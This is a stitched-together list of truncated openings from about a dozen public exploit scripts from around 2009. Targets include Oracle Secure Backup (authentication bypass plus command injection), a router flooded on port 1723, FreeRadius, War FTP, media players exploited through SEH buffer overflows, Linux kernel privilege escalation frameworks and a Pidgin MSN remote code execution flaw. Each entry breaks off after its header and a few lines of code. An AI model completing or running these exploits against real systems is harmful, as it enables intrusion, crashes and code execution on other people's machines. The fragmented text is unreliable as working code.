#!/bin/bash #Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability #1-day exploit for CVE-2009-1977 and CVE-2009-1978 #PoC script successfully tested on: #Oracle Secure Backup Server 10.3.0.1.0_win32_
Fix announce: http://www.mozilla.org/security/announce/2009/mfsa2009-48.html Bug history: https://bugzilla.mozilla.org/show_bug.cgi?id=326628 So, Firefox up through 3.0.13 had an obscure little function under window.pkcs11: long addmodule(in DOMStri
Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP. It takes a few bytes for the AP to automatically restart ?php $apaddr = 192.168.2.1; $apport=1723; $con = fsockopen($apaddr, $apport, $errno, $errstr); if (
#!/usr/bin/python # # Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret # to work correctly despite the large number of usable addresses that were tested. # # $ ./kolibri.py 192.1
#!/usr/bin/env python # FreeRadius Packet Of Death # Matthew Gillespie 2009-09-11 # Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py # http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/ import sy
/* This third version features: Complete support for i386, x86_64, ppc and ppc64; The personality trick published by Tavis Ormandy and Julien Tinnes; The TOC pointer workaround for data items addressing on ppc64 (i.e. functions on exploit code and l
/* enlightenment 200909092307 To create your own exploit module for enlightenment, just name it exp_whatever.c It will be auto-compiled by the run_exploits.sh script and thrown into the list of loaded exploit modules Each module must have the follow
#!/usr/bin/env python ################################################################## # # INMATRIX Zoom Player Pro = 6.0.0 (.MID) Integer Overflow PoC # Found By:Dr_IDE # Credits:Platen # Tested:verified on v 5.0.2 and 6.0.0 on XP SP3 # Download:
##!/usr/bin/python # Found By :: HACK4LOVE # hack4love@hotmail.com # KSP 2009R2 (m3u) Universal Local Buffer Exploit (SEH) # http://ksplayer.boo.pl/index.php # #--- info:: KSP 2009R2 Sound Player was released 28//8//2009 # AND special THANKS FOR His
# [*] Vulnerability : War FTP Daemon Format String DoS (LIST command) # [*] Detected by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com) # [*] Type : remote DoS # [*] OS : Windows # [*] Product : Jgaa's War FTP Daemon # [*] Versions affected : 1.82 RC
#!/usr/bin/perl # Found By :: HACK4LOVE # hack4love@hotmail.com # jetAudio v 7.1.9.4030 plus vx(asx/wax/wvx)Universal Local BOF (SEH) ####################################################################### # use--open file--hac4love.asx after that ju
/* * Pidgin MSN = 2.5.8 Remote Code Execution * * Pierre Nogues - pierz@hotmail.it * http://www.indahax.com/ * * * Description: * Pidgin is a multi-protocol Instant Messenger. * * This is an exploit for the vulnerability[1] discovered in Pidgin by c